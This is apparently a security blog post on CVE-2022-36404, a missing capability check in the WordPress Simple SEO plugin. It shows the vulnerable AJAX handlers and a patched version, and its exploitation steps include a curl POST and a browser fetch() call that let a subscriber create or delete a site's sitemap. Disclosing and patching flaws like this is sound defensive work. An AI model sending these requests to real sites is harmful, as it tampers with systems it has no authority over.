If you run a WordPress site and use the Simple SEO Plugin by David Cole (version 1.8.12 or lower), you need to be aware of CVE-2022-36404. This post will break down the vulnerability, show how it can be abused, provide example code, and point out what you need to do to stay secure.

What Is CVE-2022-36404?

CVE-2022-36404 is a security flaw in the Simple SEO plugin for WordPress (up to version 1.8.12). Due to broken access control, any logged-in user—even a low-privileged subscriber—can create or delete the site's SEO sitemap. Normally, only site admins should have that power.

- Affected Versions: <= 1.8.12
- Plugin Link: https://wordpress.org/plugins/simple-seo/

How Does This Happen?

The plugin registers AJAX handlers that generate or delete the sitemap. However, it does not check the capability of the current user before performing these actions. As a result, any logged-in user, even a subscriber, can send a request to the handler and create or delete the sitemap.

Here’s a simplified example of what the vulnerable code looks like in simple-seo.php:

// Inside the plugin code (vulnerable, simplified).
// generate_sitemap_file() / delete_sitemap_file() stand in for the plugin's real file helpers.
add_action('wp_ajax_simple_seo_create_sitemap', 'create_sitemap');
function create_sitemap() {
    // MISSING: capability check!
    // Any logged-in user can reach here
    generate_sitemap_file();
    wp_send_json_success('Sitemap created');
}

add_action('wp_ajax_simple_seo_delete_sitemap', 'delete_sitemap');
function delete_sitemap() {
    // MISSING: capability check!
    // Any logged-in user can delete the sitemap
    delete_sitemap_file();
    wp_send_json_success('Sitemap deleted');
}

What’s missing? The code should check that the current user is an administrator, like this:

if (!current_user_can('manage_options')) {
    wp_send_json_error('Not allowed');
    return;
}

But in the vulnerable versions, it doesn’t! That means any user with an account can affect your SEO.

1. Steal Their Own Nonce

Log in as a subscriber, then view the site’s pages or posts. If the plugin exposes its AJAX nonce in the page (often as a global JS variable), you might find something like:

var simple_seo_ajax_nonce = "abcdefgh12345678";

Or just guess/find the nonce if it’s easy to get.

Now POST to the AJAX handler, e.g. using the browser dev tools or curl:

curl -X POST -H "Cookie: wordpress_logged_in_xxx" \
     -d "action=simple_seo_delete_sitemap&security=abcdefgh12345678" \
     https://targetsite.com/wp-admin/admin-ajax.php

Or use the browser JavaScript console:

fetch('/wp-admin/admin-ajax.php', {
  method: 'POST',
  credentials: 'include',
  headers: {'Content-Type': 'application/x-www-form-urlencoded'},
  body: 'action=simple_seo_create_sitemap&security=abcdefgh12345678'
}).then(res => res.text()).then(console.log)

3. Result: Sitemap is Created or Deleted

Without proper logging or notifications, site admins might not notice. Removing the sitemap can harm SEO, and creating a new one could be used for further attacks. Possible impact:

- Cause confusion or disrupt SEO tools
- Possibly abuse this as a first step for deeper attacks (e.g. storing code in sitemap files if there’s a further vulnerability)

How To Fix or Prevent

The Simple SEO plugin patched this issue in version 1.8.13. Update as soon as possible!

Manual Mitigation:

If you can’t update right now, edit the plugin’s sitemap functions to add a capability check at the top of each AJAX handler:

// Add at the top of each wp_ajax_ sitemap handler, before any file is touched.
// wp_send_json_error() already terminates the request; the exit is a belt-and-braces guard.
if (!current_user_can('manage_options')) {
    wp_send_json_error();
    exit;
}
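As an added example (not the plugin's own code), here are the two handlers from this post rewritten with the guard the fix calls for, covering both the vulnerable code shown earlier and the manual mitigation above: a nonce check for CSRF and, separately, the `manage_options` capability check that actually authorizes the action. The hook names and the `security` field come from the post; the script handle `simple-seo`, the nonce action `simple_seo_sitemap`, the guard function name and the logging are assumptions.

```php
<?php
// Added example, not the Simple SEO plugin's real code. Hook names and the
// 'security' POST field are from the post; the 'simple-seo' script handle,
// the 'simple_seo_sitemap' nonce action and the helper names are assumed.

// Emit the nonce for the front-end script (assumes a registered handle
// 'simple-seo'). A nonce only proves the request came from a page we
// rendered (CSRF protection); it is NOT an authorization check, which is why
// a subscriber's own nonce was enough to abuse the unpatched handlers.
add_action('wp_enqueue_scripts', function () {
    wp_localize_script('simple-seo', 'simple_seo_ajax', [
        'nonce' => wp_create_nonce('simple_seo_sitemap'),
    ]);
});

// Shared guard: verify the nonce first, then the capability. Denied attempts
// are logged so an admin can notice probing against the endpoint.
function simple_seo_guard_sitemap_request() {
    check_ajax_referer('simple_seo_sitemap', 'security'); // dies on a bad nonce
    if (!current_user_can('manage_options')) {
        error_log(sprintf(
            'simple-seo: sitemap action "%s" denied for user %d',
            sanitize_key($_POST['action'] ?? ''),
            get_current_user_id()
        ));
        wp_send_json_error('Not allowed', 403); // sends JSON and exits
    }
}

// Only wp_ajax_ (logged-in) hooks are registered; no wp_ajax_nopriv_ variant,
// so anonymous requests never reach these handlers at all.
add_action('wp_ajax_simple_seo_create_sitemap', function () {
    simple_seo_guard_sitemap_request();
    generate_sitemap_file();   // plugin's own helper (assumed name)
    wp_send_json_success('Sitemap created');
});

add_action('wp_ajax_simple_seo_delete_sitemap', function () {
    simple_seo_guard_sitemap_request();
    delete_sitemap_file();     // plugin's own helper (assumed name)
    wp_send_json_success('Sitemap deleted');
});
```

With this in place a subscriber who submits the same curl or fetch request shown above receives a 403 JSON error and a line in the PHP error log, instead of a regenerated or deleted sitemap.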

References

- Official CVE Record – CVE-2022-36404
- WPScan Advisory
- Simple SEO Plugin Page
- Plugin Changelog

Final Thoughts

Broken access control is a common and dangerous bug in WordPress plugins. CVE-2022-36404 shows that even the simplest plugin functions should *always* check user capabilities.

If you use the Simple SEO plugin, update now and check that all your other plugins enforce strict permission checks for sensitive actions!


*Stay safe and keep your WordPress plugins up to date!*

Timeline

Published on: 11/03/2022 20:15:00 UTC
Last modified on: 11/04/2022 14:10:00 UTC